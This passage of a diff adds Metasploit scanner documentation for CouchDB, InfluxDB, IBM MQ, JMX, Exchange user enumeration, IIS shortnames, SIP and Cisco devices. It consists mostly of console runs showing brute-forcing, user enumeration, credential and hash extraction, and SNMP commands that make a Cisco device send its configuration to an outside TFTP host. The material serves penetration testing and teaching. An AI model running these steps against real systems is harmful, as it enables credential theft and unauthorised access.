[+] 1.1.1.1:5984 File saved in: /root/.msf4/loot/20180721105522_default_1.1.1.1_couchdb.enum_888970.bin
|
||||
|
||||
msf5 auxiliary(scanner/couchdb/couchdb_enum) > services
|
||||
Services
|
||||
========
|
||||
|
||||
host port proto name state info
|
||||
---- ---- ----- ---- ----- ----
|
||||
1.1.1.1 5984 tcp couchdb open HTTP/1.1 200 OK
|
||||
Server: CouchDB/1.6.1 (Erlang OTP/18)
|
||||
Date: Sat, 21 Jul 2018 14:54:45 GMT
|
||||
Content-Type: text/plain; charset=utf-8
|
||||
Content-Length: 127
|
||||
Cache-Control: must-revalidate
|
||||
|
||||
{"couchdb":"Welcome","uuid":"6f08e89795bd845efc6c2bf3d57799e5","version":"1.6.1","vendor":{"version":"16.04","name":"Ubuntu"}}
|
||||
|
||||
```
|
||||
[+] 127.0.0.1:5984 - File saved in: /Users/wvu/.msf4/loot/20190107125002_default_127.0.0.1_couchdb.enum_790231.bin
|
||||
[+] 127.0.0.1:5984 - _global_changes saved in: /Users/wvu/.msf4/loot/20190107125002_default_127.0.0.1_couchdb._global__841794.bin
|
||||
[+] 127.0.0.1:5984 - _replicator saved in: /Users/wvu/.msf4/loot/20190107125002_default_127.0.0.1_couchdb._replica_022445.bin
|
||||
[+] 127.0.0.1:5984 - _users saved in: /Users/wvu/.msf4/loot/20190107125002_default_127.0.0.1_couchdb._users_671128.bin
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(scanner/couchdb/couchdb_enum) >
|
||||
```
|
||||
|
|
|
@ -0,0 +1,47 @@
|
|||
## Description
|
||||
|
||||
This module scans for the presence of the HTTP interface for a cisco device and attempts to enumerate it using basic authentication.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
Any Cisco networking device with the HTTP inteface turned on.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Enable the web interface on a cisco device `ip http server`
|
||||
2. Start msfconsole
|
||||
3. Do: ```use auxiliary/scanner/http/cisco_device_manager```
|
||||
4. Do: ```set RHOSTS [IP]```
|
||||
5. Do: ```run```
|
||||
|
||||
## Options
|
||||
|
||||
**HttpUsername**
|
||||
|
||||
Username to use for basic authentication. Default value is `cisco`
|
||||
|
||||
**HttpPassword**
|
||||
|
||||
Password to use for basic authentication. Default value is `cisco`
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Tested on Cisco UC520-8U-4FXO-K9 running IOS 12.4
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/scanner/http/cisco_device_manager
|
||||
msf5 auxiliary(scanner/http/cisco_device_manager) > set rhosts 2.2.2.2
|
||||
rhosts => 2.2.2.2
|
||||
msf5 auxiliary(scanner/http/cisco_device_manager) > set vebose true
|
||||
vebose => true
|
||||
msf5 auxiliary(scanner/http/cisco_device_manager) > run
|
||||
|
||||
[+] 2.2.2.2:80 Successfully authenticated to this device
|
||||
[+] 2.2.2.2:80 Processing the configuration file...
|
||||
[+] 2.2.2.2:80 MD5 Encrypted Enable Password: $1$TF.y$3E7pZ2szVvQw5JG8SDjNa1
|
||||
[+] 2.2.2.2:80 Username 'cisco' with MD5 Encrypted Password: $1$DaqN$iP32E5WcOOui/H66R63QB0
|
||||
[+] 2.2.2.2:80 SNMP Community (RO): public
|
||||
[+] 2.2.2.2:80 ePhone Username 'phoneone' with Password: 111111
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
|
@ -0,0 +1,63 @@
|
|||
|
||||
## Microsoft IIS shortname vulnerability scanner
|
||||
|
||||
The vulnerability is caused by a tilde character `~` in a GET or OPTIONS request, which could allow remote attackers to disclose 8.3 filenames (short names). In 2010, Soroush Dalili and Ali Abbasnejad discovered the original bug (GET request) This was publicly disclosed in 2012. In 2014, Soroush Dalili discovered that newer IIS installations are vulnerable with OPTIONS.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
Older Microsoft IIS installations are vulnerable with GET, newer installations with OPTIONS
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install IIS (default installations are vulnerable)
|
||||
2. Start msfconsole
|
||||
3. Check:
|
||||
|
||||
```
|
||||
msf > use auxiliary/scanner/http/iis_shortname_scanner
|
||||
msf auxiliary(iis_shortname_scanner) > set 172.16.249.128
|
||||
msf auxiliary(iis_shortname_scanner) > check
|
||||
[+] 172.16.249.128:80 The target is vulnerable.
|
||||
```
|
||||
|
||||
4. Scan:
|
||||
|
||||
```
|
||||
msf auxiliary(iis_shortname_scanner) > run
|
||||
[*] Scanning in progress...
|
||||
[+] Directories found
|
||||
http://172.16.249.128/aspnet~1
|
||||
http://172.16.249.128/secret~1
|
||||
[+] Files found
|
||||
http://172.16.249.128/web~1.con
|
||||
http://172.16.249.128/index~1.htm
|
||||
http://172.16.249.128/upload~1.asp
|
||||
http://172.16.249.128/upload~2.asp
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
## Options
|
||||
|
||||
```
|
||||
Module options (auxiliary/scanner/http/iis_shortname_scanner):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
PATH / yes The base path to start scanning from
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOST yes The target address
|
||||
RPORT 80 yes The target port (TCP)
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
VHOST no HTTP server virtual host
|
||||
```
|
||||
|
||||
## Remediation
|
||||
|
||||
Create registry key `NtfsDisable8dot3NameCreation` at `HKLM\SYSTEM\CurrentControlSet\Control\FileSystem`, with a value of `1`
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* https://soroush.secproject.com/blog/tag/iis-tilde-vulnerability/
|
||||
* https://support.detectify.com/customer/portal/articles/1711520-microsoft-iis-tilde-vulnerability
|
|
@ -0,0 +1,46 @@
|
|||
This module enumerates databases on InfluxDB using the REST API using the default authentication of root:root.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Do: ```use auxiliary/scanner/http/influxdb_enum```
|
||||
2. Do: ```set RHOSTS [IP]```
|
||||
3. Do: ```set RPORT [PORT]```
|
||||
4. Do: ```run```
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/scanner/http/influxdb_enum
|
||||
msf5 auxiliary(scanner/http/influxdb_enum) > set RHOST 172.25.65.20
|
||||
RHOST => 172.25.65.20
|
||||
msf5 auxiliary(scanner/http/influxdb_enum) > set VERBOSE true
|
||||
VERBOSE => true
|
||||
msf5 auxiliary(scanner/http/influxdb_enum) > run
|
||||
|
||||
[+] 172.25.65.20:8086 - Influx Version: 1.5.1
|
||||
[+] 172.25.65.20:8086 - Influx DB Found:
|
||||
|
||||
{
|
||||
"results": [
|
||||
{
|
||||
"statement_id": 0,
|
||||
"series": [
|
||||
{
|
||||
"name": "databases",
|
||||
"columns": [
|
||||
"name"
|
||||
],
|
||||
"values": [
|
||||
[
|
||||
"_internal"
|
||||
]
|
||||
]
|
||||
}
|
||||
]
|
||||
}
|
||||
]
|
||||
}
|
||||
|
||||
[+] File saved in: /Users/unix/.msf4/loot/20180423050119_default_172.25.65.20_influxdb.enum_623871.txt
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
|
@ -0,0 +1,48 @@
|
|||
|
||||
## Vulnerable Application
|
||||
|
||||
* IBM Downloads page: https://developer.ibm.com/messaging/mq-downloads/
|
||||
* Tested on IBM MQ 7.5, 8 and 9
|
||||
* Usage:
|
||||
* Download and install MQ Server
|
||||
* Create a new Queue Manager
|
||||
* Create a new channel (without SSL)
|
||||
* Run the module
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Example steps in this format (is also in the PR):
|
||||
|
||||
1. Install IBM MQ Server 7.5, 8, or 9
|
||||
2. Start msfconsole
|
||||
3. Do: ```use auxiliary/scanner/misc/ibm_mq_channel_brute```
|
||||
4. Do: ```set channels_file <channel_list_file>```
|
||||
5. Do: ```set rhosts <target_IP>```
|
||||
6. Do: ```set rport <port>```
|
||||
7. Do: ```run```
|
||||
|
||||
Example output:
|
||||
```
|
||||
msf auxiliary(scanner/misc/ibm_mq_channel_brute) > run
|
||||
|
||||
[*] 10.1.1.144:1414 - Found channel: TEST.CHANNEL, IsEncrypted: False, IsMQI: True
|
||||
[*] 10.1.1.144:1414 - Found channel: SYSTEM.ADMIN.SVRCONN, IsEncrypted: False, IsMQI: True
|
||||
|
||||
[+] 10.1.1.144:1414 - Channels found: ["TEST.CHANNEL", "SYSTEM.ADMIN.SVRCONN"]
|
||||
[+] 10.1.1.144:1414 - Unencrypted MQI Channels found: ["TEST.CHANNEL", "SYSTEM.ADMIN.SVRCONN"]
|
||||
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
|
||||
```
|
||||
|
||||
## Options
|
||||
|
||||
**The CHANNELS_FILE option**
|
||||
|
||||
This option should contain the path to a text file which contains a list of channel names that will be checked. One channel name per line.
|
||||
|
||||
## Scenarios
|
||||
|
||||
This module can be used to identify a list of channel names that are configured on the Queue Manager. Additionally, the module will return whether each identified channel uses SSL and if it MQI type.
|
||||
After obtaining a list of valid channel names, these can be used to further enumerate the MQ installation. For example, the ibm_mq_enum module can be executed using a valid channel name in order to obtain information regarding the Queue Manager.
|
|
@ -0,0 +1,36 @@
|
|||
## Vulnerable Application
|
||||
* IBM Downloads page: https://developer.ibm.com/messaging/mq-downloads/
|
||||
* Tested on IBM MQ 7.5, 8 and 9
|
||||
* Usage:
|
||||
* Download and install MQ Server
|
||||
* Create a new Queue Manager
|
||||
* Create a new channel (without SSL)
|
||||
* Run the module
|
||||
|
||||
## Verification Steps
|
||||
Example steps in this format (is also in the PR):
|
||||
1. Install IBM MQ Server 7.5, 8, or 9
|
||||
2. Start msfconsole
|
||||
3. Do: ```use auxiliary/scanner/misc/ibm_mq_enum```
|
||||
4. Do: ```set channel <channel_name>```
|
||||
5. Do: ```set rhosts <target_IP>```
|
||||
6. Do: ```set rport <port>```
|
||||
7. Do: ```run```
|
||||
|
||||
Example output:
|
||||
```
|
||||
msf auxiliary(scanner/misc/ibm_mq_enum) > run
|
||||
|
||||
[+] 10.1.1.144: - 10.1.1.144:1414 - Queue Manager Name: TESTQM - MQ Version: 9.1.0.0
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
|
||||
```
|
||||
|
||||
## Options
|
||||
**The CHANNEL option**
|
||||
|
||||
This option should contain the name of a valid MQ channel. This can be obtained using the module ```auxiliary/scanner/misc/ibm_mq_channel_brute```
|
||||
|
||||
## Scenarios
|
||||
This module can be used to obtain the Queue Manager name as well as the version of the MQ being used on the target host. When the Queue Manager name and a valid MQI channel name without SSL is known , the module ```auxiliary/scanner/misc/ibm_mq_login``` can be used to identify usernames that can authenticate to the Queue Manager.
|
|
@ -0,0 +1,53 @@
|
|||
## Vulnerable Application
|
||||
|
||||
* IBM Downloads page: https://developer.ibm.com/messaging/mq-downloads/
|
||||
* Tested on IBM MQ 7.5, 8 and 9
|
||||
* Usage:
|
||||
* Download and install MQ Server from the above link
|
||||
* Create a new Queue Manager
|
||||
* Create a new channel (without SSL)
|
||||
* Allow remote connections for admin users by removing the CHLAUTH record that denies all users or configure access for a specific username.
|
||||
* Run the module
|
||||
|
||||
## Verification Steps
|
||||
Example steps in this format (is also in the PR):
|
||||
1. Install IBM MQ Server 7.5, 8, or 9
|
||||
2. Start msfconsole
|
||||
3. Do: ```use auxiliary/scanner/misc/ibm_mq_login```
|
||||
4. Do: ```set channel <admin_channel_name_without_ssl>```
|
||||
5. Do: ```set queue_manager <queue_manager_name>```
|
||||
5. Do: ```set usernames_file <list_of_usernames>```
|
||||
6. Do: ```set rhosts <target_IP>```
|
||||
7. Do: ```set rport <port>```
|
||||
8. Do: ```run```
|
||||
|
||||
Example output:
|
||||
```
|
||||
msf auxiliary(scanner/misc/ibm_mq_login) > run
|
||||
|
||||
[*] 10.1.1.10:1416 - Found username: admin
|
||||
[*] 10.1.1.10:1416 - Found username: test
|
||||
|
||||
[+] 10.1.1.10:1416 - 10.1.1.10:1416 Valid usernames found: ["admin", "test"]
|
||||
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
## Options
|
||||
**The USERNAMES_FILE option**
|
||||
|
||||
This option should contain the path to a text file which contains a list of usernames that will be checked. One username per line.
|
||||
|
||||
**The QUEUE_MANAGER option**
|
||||
|
||||
This option should contain the name of the target Queue Manager.
|
||||
|
||||
**The CHANNEL option**
|
||||
|
||||
This option should contain the name of a server-connection channel that will be used to connect to the Queue Manager.
|
||||
|
||||
## Scenarios
|
||||
This module can be used to identify a list of usernames that are allowed to connect to the Queue Manager. This module requires the name of a valid server-connection channel, the Queue Manager's name which can be obtained by running the following 2 modules:
|
||||
* ```auxiliary/scanner/misc/ibm_mq_channel_brute```
|
||||
* ```auxiliary/scanner/misc/ibm_mq_enum```
|
||||
After identifying a valid username, MQ Explorer can be used to connect to the Queue Manager using the information gathered.
|
|
@ -0,0 +1,59 @@
|
|||
The `java_jmx_scanner` module uses the `Msf::Exploit::Remote::Java::Rmi::Client` library to perform a handshake with a Java JMX MBean server. JMX MBean listens in 1099 by default, and is used to manage and monitor Java applications.
|
||||
|
||||
The module returns whether the target is a Java JMX MBeans server and also outputs if the server requires authentication.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
While many implementations of JMX are available, the module was successfully tested against an Apache ActiveMQ 5.13.3 server with JMX enabled. For convenience, a docker container (`antonw/activemq-jmx`) supports JMX and can be tweaked to require authentication.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
See [PR#10401](https://github.com/rapid7/metasploit-framework/pull/10401) for general information, and [this specific comment](https://github.com/rapid7/metasploit-framework/pull/10401#issuecomment-448705897) for steps to require JMX authentication in the container. In summary:
|
||||
|
||||
```
|
||||
docker run -p 1099:1099 antonw/activemq-jmx
|
||||
docker exec -u=root -it `docker ps -q` /bin/bash
|
||||
|
||||
# echo -e "monitorRole QED\ncontrolRole R&D" /etc/java-7-openjdk/management/jmxremote.password
|
||||
# chown activemq /etc/java-7-openjdk/management/jmxremote.password
|
||||
# chmod 400 /etc/java-7-openjdk/management/jmxremote.password
|
||||
# sed 's/-Dcom.sun.management.jmxremote.authenticate=false/-Dcom.sun.management.jmxremote.authenticate=true/' /opt/apache-activemq-5.13.3/bin/env
|
||||
|
||||
docker restart `docker ps -q`
|
||||
```
|
||||
|
||||
## Options
|
||||
|
||||
**Option name**
|
||||
|
||||
Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### ActiveMQ 5.13.3
|
||||
|
||||
Against the above-described Docker container, the workflow looks like:
|
||||
|
||||
```
|
||||
msf5 auxiliary(scanner/misc/java_jmx_server) > set RHOST 127.0.0.1
|
||||
msf5 auxiliary(scanner/misc/java_jmx_server) > set RPORT 1099
|
||||
msf5 auxiliary(scanner/misc/java_jmx_server) > run
|
||||
[*] Reloading module...
|
||||
|
||||
[*] 127.0.0.1:1099 - Sending RMI header...
|
||||
[*] 127.0.0.1:1099 - localhost:1099 Java JMX MBean authentication required
|
||||
[*] 127.0.0.1:1099 - Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
In addition, note that `services` within the data model has been updated:
|
||||
|
||||
```
|
||||
msf5 auxiliary(scanner/misc/java_jmx_server) > services
|
||||
Services
|
||||
========
|
||||
|
||||
host port proto name state info
|
||||
---- ---- ----- ---- ----- ----
|
||||
127.0.0.1 1099 tcp java-rmi open JMX MBean server accessible
|
||||
```
|
|
@ -0,0 +1,21 @@
|
|||
OWA (Outlook Webapp) is vulnerable to time-based user enumeration attacks.
|
||||
This module leverages all known, and even some lesser-known services exposed by default
|
||||
Exchange installations to enumerate email.
|
||||
|
||||
Error-based user enumeration for Office 365 integrated email addresses
|
||||
|
||||
## Verification
|
||||
|
||||
- Start `msfconsole`
|
||||
- `use auxiliary/scanner/msmail/exchange_enum`
|
||||
- `set (`EMAIL` or `EMAIL_FILE`)`
|
||||
- `run`
|
||||
- `creds`
|
||||
|
||||
*Results should look something like below if valid users were found:*
|
||||
|
||||
```
|
||||
host origin service public private realm private_type
|
||||
---- ------ ------- ------ ------- ----- ------------
|
||||
<ip> <ip> 443/tcp (owa) chris@somecompany.com
|
||||
```
|
|
@ -0,0 +1,42 @@
|
|||
OWA (Outlook Webapp) is vulnerable to time-based user enumeration attacks.
|
||||
This module leverages all known, and even some lesser-known services exposed by default
|
||||
Exchange installations to enumerate users. It also targets Office 365 for error-based user enumeration.
|
||||
|
||||
**Identify Command**
|
||||
- Used for gathering information about a host that may be pointed towards an Exchange or o365 tied domain
|
||||
- Queries for specific DNS records related to Office 365 integration
|
||||
- Attempts to extract internal domain name for onprem instance of Exchange
|
||||
- Identifies services vulnerable to time-based user enumeration for onprem Exchange
|
||||
- Lists password-sprayable services exposed for onprem Exchange host
|
||||
|
||||
**Note:** Currently uses RHOSTS which resolves to an IP which is NOT desired, this is currently being fixed
|
||||
|
||||
## Verification
|
||||
|
||||
- Start `msfconsole`
|
||||
- `use auxiliary/scanner/msmail/host_id`
|
||||
- `set RHOSTS <target>`
|
||||
- `run`
|
||||
|
||||
*Results should look like below:*
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/scanner/msmail/host_id
|
||||
msf5 auxiliary(scanner/msmail/host_id) > set RHOSTS <host>
|
||||
RHOSTS => <host>
|
||||
msf5 auxiliary(scanner/msmail/host_id) > run
|
||||
|
||||
[*] Running for <ip>...
|
||||
[*] Attempting to harvest internal domain:
|
||||
[*] Internal Domain:
|
||||
[*] <domain>
|
||||
[*] [-] Domain is not using o365 resources.
|
||||
[*] Identifying endpoints vulnerable to time-based enumeration:
|
||||
[*] [+] https://<host>/Microsoft-Server-ActiveSync
|
||||
[*] [+] https://<host>/autodiscover/autodiscover.xml
|
||||
[*] [+] https://<host>/owa
|
||||
[*] Identifying exposed Exchange endpoints for potential spraying:
|
||||
[*] [+] https://<host>/oab
|
||||
[*] [+] https://<host>/ews
|
||||
|
||||
```
|
|
@ -0,0 +1,25 @@
|
|||
OWA (Outlook Webapp) is vulnerable to time-based user enumeration attacks.
|
||||
This module leverages all known, and even some lesser-known services exposed by default
|
||||
Exchange installations to enumerate users. It also targets Office 365 for error-based user enumeration.
|
||||
|
||||
- Error-based user enumeration for on premise Exchange services
|
||||
|
||||
**Note:** Currently uses RHOSTS which resolves to an IP which is NOT desired, this is currently being fixed
|
||||
|
||||
## Verification
|
||||
|
||||
- Start `msfconsole`
|
||||
- `use auxiliary/scanner/msmail/onprem_enum`
|
||||
- `set RHOSTS <target>`
|
||||
- `set (`USER` or `USER_FILE`)
|
||||
- `run`
|
||||
- `creds`
|
||||
|
||||
*Results should look something like below if valid users were found:*
|
||||
|
||||
```
|
||||
host origin service public private realm private_type
|
||||
---- ------ ------- ------ ------- ----- ------------
|
||||
10.1.1.1 10.1.1.1 443/tcp (owa)
|
||||
10.1.1.1 10.1.1.1 443/tcp (owa) chris
|
||||
```
|
|
@ -0,0 +1,47 @@
|
|||
## Vulnerable Application
|
||||
|
||||
SIP is a signaling protocol for voice, and video typically associated with VOIP and typically used in commercial
|
||||
phone systems. SIP and VOIP are gaining popularity with home and cellular voice/video calling systems as well.
|
||||
|
||||
This module scans the TCP port to identify what OPTIONS are available on the SIP service.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: ```use auxiliary/scanner/sip/options_tcp```
|
||||
3. Do: ```set rhosts [ip]```
|
||||
4. Do: ```run```
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Cisco UC520
|
||||
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/scanner/sip/options_tcp
|
||||
msf5 auxiliary(scanner/sip/options_tcp) > set rhosts 2.2.2.2
|
||||
rhosts => 2.2.2.2
|
||||
msf5 auxiliary(scanner/sip/options_tcp) > run
|
||||
|
||||
[*] 2.2.2.2:5060 - 2.2.2.2:5060 tcp SIP/2.0 200 OK: {"Server"=>"Cisco-SIPGateway/IOS-12.x", "Allow"=>"INVITE, OPTIONS, BYE, CANCEL, ACK, PRACK, UPDATE, REFER, SUBSCRIBE, NOTIFY, INFO, REGISTER"}
|
||||
[*] 2.2.2.2:5060 - Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
## Confirming using NMAP
|
||||
|
||||
Utilizing the [sip-methods](https://nmap.org/nsedoc/scripts/sip-methods.html) script
|
||||
|
||||
```
|
||||
nmap --script=sip-methods -p 5060 2.2.2.2
|
||||
|
||||
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-11 15:44 EDT
|
||||
Nmap scan report for 2.2.2.2
|
||||
Host is up (0.0036s latency).
|
||||
|
||||
PORT STATE SERVICE
|
||||
5060/tcp open sip
|
||||
|_sip-methods: INVITE, OPTIONS, BYE, CANCEL, ACK, PRACK, UPDATE, REFER, SUBSCRIBE, NOTIFY, INFO, REGISTER
|
||||
MAC Address: 00:1B:8F:AA:AA:AA (Cisco Systems)
|
||||
```
|
||||
|
|
@ -0,0 +1,143 @@
|
|||
## Vulnerable Application
|
||||
|
||||
Cisco IOS devices can be configured to back-up their running and startup configurations via SNMP.
|
||||
This is a well [documented](https://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/15217-copy-configs-snmp.html#copying_startup)
|
||||
feature of IOS and many other networking devices, and is part of an administrator functionality.
|
||||
A read-write community string is required, as well as a tftp server (metasploit includes one).
|
||||
After the config has been copied, the SNMP paramters are deleted.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Enable SNMP with a read/write community string on IOS: `snmp-server community private rw`
|
||||
2. Start msfconsole
|
||||
3. Do: ```use auxiliary/scanner/snmp/cisco_config_tftp```
|
||||
4. Do: ```set COMMUNITY [read-write snmp]```
|
||||
5. Do: ```set rhosts [ip]```
|
||||
6. Do: ```run```
|
||||
|
||||
## Options
|
||||
|
||||
**COMMUNITY**
|
||||
|
||||
The SNMP community string to use which must be read-write. Default is `public`.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Cisco UC520-8U-4FXO-K9 running IOS 12.4
|
||||
|
||||
```
|
||||
msf5 > setg rhosts 2.2.2.2
|
||||
rhosts => 2.2.2.2
|
||||
msf5 > use auxiliary/scanner/snmp/cisco_config_tftp
|
||||
msf5 auxiliary(scanner/snmp/cisco_config_tftp) > set community private
|
||||
community => private
|
||||
msf5 auxiliary(scanner/snmp/cisco_config_tftp) > run
|
||||
|
||||
[*] Starting TFTP server...
|
||||
[*] Scanning for vulnerable targets...
|
||||
[*] Trying to acquire configuration from 2.2.2.2...
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Providing some time for transfers to complete...
|
||||
[*] Incoming file from 2.2.2.2 - 2.2.2.2.txt 22831 bytes
|
||||
[+] 2.2.2.2:161 MD5 Encrypted Enable Password: $1$TF.y$3E7pZ2szVvQw5JG8SDjNa1
|
||||
[+] 2.2.2.2:161 Username 'cisco' with MD5 Encrypted Password: $1$DaqN$iP32E5WcOOui/H66R63QB0
|
||||
[+] 2.2.2.2:161 SNMP Community (RO): public
|
||||
[+] 2.2.2.2:161 SNMP Community (RW): private
|
||||
[*] Shutting down the TFTP service...
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
### Manual Interaction
|
||||
This process can also be executed manually utilizing Metasploit's TFTP server.
|
||||
Cisco's [documentation](https://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/15217-copy-configs-snmp.html#copying_startup)
|
||||
was utilized to create this process.
|
||||
|
||||
1. Start the TFTP server
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/server/tftp
|
||||
msf5 auxiliary(server/tftp) > run
|
||||
[*] Auxiliary module running as background job 0.
|
||||
msf5 auxiliary(server/tftp) >
|
||||
[*] Starting TFTP server on 0.0.0.0:69...
|
||||
[*] Files will be served from /tmp
|
||||
[*] Uploaded files will be saved in /tmp
|
||||
```
|
||||
|
||||
2. Execute the SNMP commands. An integer is required to group the requests together, `666` is used in this example.
|
||||
|
||||
```
|
||||
msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 i 1
|
||||
[*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 i 1
|
||||
|
||||
iso.3.6.1.4.1.9.9.96.1.1.1.1.2.666 = INTEGER: 1
|
||||
msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.3.666 i 4
|
||||
[*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.3.666 i 4
|
||||
|
||||
iso.3.6.1.4.1.9.9.96.1.1.1.1.3.666 = INTEGER: 4
|
||||
msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.4.666 i 1
|
||||
[*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.4.666 i 1
|
||||
|
||||
iso.3.6.1.4.1.9.9.96.1.1.1.1.4.666 = INTEGER: 1
|
||||
msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.5.666 a "1.1.1.1"
|
||||
[*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.5.666 a "1.1.1.1"
|
||||
|
||||
iso.3.6.1.4.1.9.9.96.1.1.1.1.5.666 = IpAddress: 1.1.1.1
|
||||
msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 s "backup_config"
|
||||
[*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 s "backup_config"
|
||||
|
||||
iso.3.6.1.4.1.9.9.96.1.1.1.1.6.666 = STRING: "backup_config"
|
||||
msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 i 1
|
||||
[*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 i 1
|
||||
|
||||
iso.3.6.1.4.1.9.9.96.1.1.1.1.14.666 = INTEGER: 1
|
||||
```
|
||||
|
||||
3. At this point the config is transferring, we need to wait a few seconds. Lastly, we'll remove `666` from the system.
|
||||
|
||||
```
|
||||
msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 i 6
|
||||
[*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 i 6
|
||||
|
||||
iso.3.6.1.4.1.9.9.96.1.1.1.1.14.666 = INTEGER: 6
|
||||
```
|
||||
|
||||
4. Confirm we have our config file
|
||||
|
||||
```
|
||||
msf5 auxiliary(server/tftp) > ls -lah /tmp/backup_config
|
||||
[*] exec: ls -lah /tmp/backup_config
|
||||
|
||||
-rw-r--r-- 1 root root 23K Oct 11 22:20 /tmp/backup_config
|
||||
```
|
||||
|
||||
## Confirming using NMAP
|
||||
|
||||
Utilizing the [snmp-ios-config](https://nmap.org/nsedoc/scripts/snmp-ios-config.html) script
|
||||
|
||||
```
|
||||
nmap -sU -p 161 --script snmp-ios-config --script-args creds.snmp=:private 192.168.2.239
|
||||
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-11 22:30 EDT
|
||||
Nmap scan report for 192.168.2.239
|
||||
Host is up (0.0034s latency).
|
||||
|
||||
PORT STATE SERVICE
|
||||
161/udp open snmp
|
||||
| snmp-ios-config:
|
||||
| !
|
||||
| ! Last configuration change at 18:01:46 PST Fri Jan 7 2000 by cisco
|
||||
| ! NVRAM config last updated at 06:07:55 PST Tue Jan 4 2000 by cisco
|
||||
| !
|
||||
| version 12.4
|
||||
| parser config cache interface
|
||||
| no service pad
|
||||
| service timestamps debug datetime msec
|
||||
| service timestamps log datetime msec
|
||||
| no service password-encryption
|
||||
| service internal
|
||||
| service compress-config
|
||||
| service sequence-numbers
|
||||
| !
|
||||
| hostname UC520
|
||||
...sip...
|
||||
```
|
|
@ -0,0 +1,49 @@
|
|||
## Vulnerable Application
|
||||
|
||||
Cisco IOS devices can be configured to retrieve, via tftp, a file via SNMP.
|
||||
This is a well [documented](https://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/15217-copy-configs-snmp.html#copying_startup)
|
||||
feature of IOS and many other networking devices, and is part of an administrator functionality.
|
||||
A read-write community string is required, as well as a tftp server (metasploit includes one).
|
||||
The file will be saved to `flash:`.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Enable SNMP with a read/write community string on IOS: `snmp-server community private rw`
|
||||
2. Start msfconsole
|
||||
3. Do: ```use auxiliary/scanner/snmp/cisco_upload_file```
|
||||
4. Do: ```set COMMUNITY [read-write snmp]```
|
||||
5. Do: ```set rhosts [ip]```
|
||||
6. Do: ```set source [file]```
|
||||
7. Do: ```run```
|
||||
|
||||
## Options
|
||||
|
||||
**COMMUNITY**
|
||||
|
||||
The SNMP community string to use which must be read-write. Default is `public`.
|
||||
|
||||
**SOURCE**
|
||||
|
||||
The location of the source file to be uploaded to the Cisco device.
|
||||
|
||||
## Scenarios
|
||||
|
